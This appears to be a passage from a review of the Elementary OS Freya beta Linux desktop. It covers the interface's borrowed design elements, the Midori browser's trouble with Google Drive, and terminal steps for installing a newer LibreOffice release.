You only need scratch the surface to find out that Freya has taken hints from nearly every major interface and rolled them into a coherent whole that will please everyone. Consider this:

  • OSX dock

  • Chrome OS menu

  • GNOME Shell panel

  • Multiple workspaces

  • OSX consistency in design

  • Ubuntu system settings

  • Ubuntu Software Center.

Do you see where that is going? With those pieces working as a cohesive unit, the Freya desktop is already light years ahead of a number of platforms. And they do work together very well.

The foundation

Elementary OS did right by choosing Ubuntu as its foundation. With this, they receive the Ubuntu Software Center, which happens to be one of the most user-friendly package managers within the Linux ecosystem. This also adds the Ubuntu System Settings tool, which is quite simple to use (Figure 2).

Figure 2: The Elementary OS Freya System Settings tool.

Where Elementary OS Freya departs from Ubuntu (besides Unity) is the default applications. This also happens to be one area where Freya does stumble a bit. By this, I mean the default web browser. I get the desire to use Midori over the likes of Chrome or Firefox; but the reality is that choice limits the platform in a number of ways (think supported sites). For someone like me, who depends upon Google Drive, Midori simply does not work. When I try to access Google Drive, I receive the warning You are using an unsupported browser.

To get around this, I must install either Chrome or Firefox. Not a problem, of course. All I need to do is hop on over to the Software Center and install Firefox. If I want Chrome, I head over to the Chrome download location and download the installable .deb file. If you install either Chrome or Firefox, surprisingly enough, the design scheme holds true for both.

NOTE: If you want to install Chrome on the current Freya beta, I highly recommend against doing so. Every attempt to load the Chrome download page (through either Midori or Firefox) actually crashes the Freya desktop to the point where a hard restart is necessary. So install Firefox through the Software Center and then download Chrome with Firefox. I did, however, manage to download the .deb file for Chrome on one machine, transfer it (via USB), and then install Chrome on Elementary OS. Once this was done, the Chrome Download page loaded fine (from Chrome only) and Google Drive worked flawlessly.

Missing apps

Outside of a supported browser, the one area that Elementary OS needs a bit of attention is the application selection. Upon installation, you will find no sign of an office suite or graphics tool. In fact, the closest thing to a word processor is the Scratch text editor. There is no LibreOffice to be found (and with the state of Midori rendering Google Drive useless, this is an issue).

Yes, you can hop over to the Software Center and install LibreOffice, but we’re looking at a Linux desktop variant that offers one of the most well designed interfaces for new users. Why make those users jump through hoops to have what nearly every flavor of Linux installs by default? On top of that, when installing LibreOffice through the Software Center (on Elementary OS), you wind up with a very out of date iteration of the software (4.2.8.2), which completely shatters the aesthetics of the platform (Figure 3).

Figure 3: An out-of-date version of LibreOffice breaks the global theme.

Including LibreOffice (and an up-to-date version at that) would take next to nothing. The latest iteration of Ubuntu (15.04) includes LibreOffice 4.4. This release of the flagship open source office suite would be much better suited for Elementary OS Freya … on every level. I highly recommend downloading the main LibreOffice installer and installing with the following steps:

  1. Open a terminal window.

  2. Change into the Downloads folder (assuming you downloaded the file there) with the command cd Downloads.

  3. Unpack the file with the command tar xvzf LibreOffice_XXX.tar.gz (Where XXX is the release number).

  4. Change into the DEBS subfolder of the newly created directory.

  5. Issue the command sudo dpkg -i *deb

Once the installation is complete, you’ll need to run the new install from the command line (since the entries for LibreOffice in the Applications menu will still be the old 4.2 release). The command to run the new version of LibreOffice is libreoffice4.4. Once opened, you can lock the launcher to the dock by right-clicking the LibreOffice icon in the dock and selecting Keep in Dock.

There is so much to love about Elementary OS Freya. Considering this platform is still in beta makes it all the more impressive. Even though there are areas that could use a bit of polish, what we are looking at could easily take over as the single most user-friendly and well designed Linux distribution to date.

Have you given Elementary OS Freya a try? If so, what was your impression? Will you be ready to hop from your current distribution to this new flavor, once it is out of beta? If not, what keeps you from jumping ship?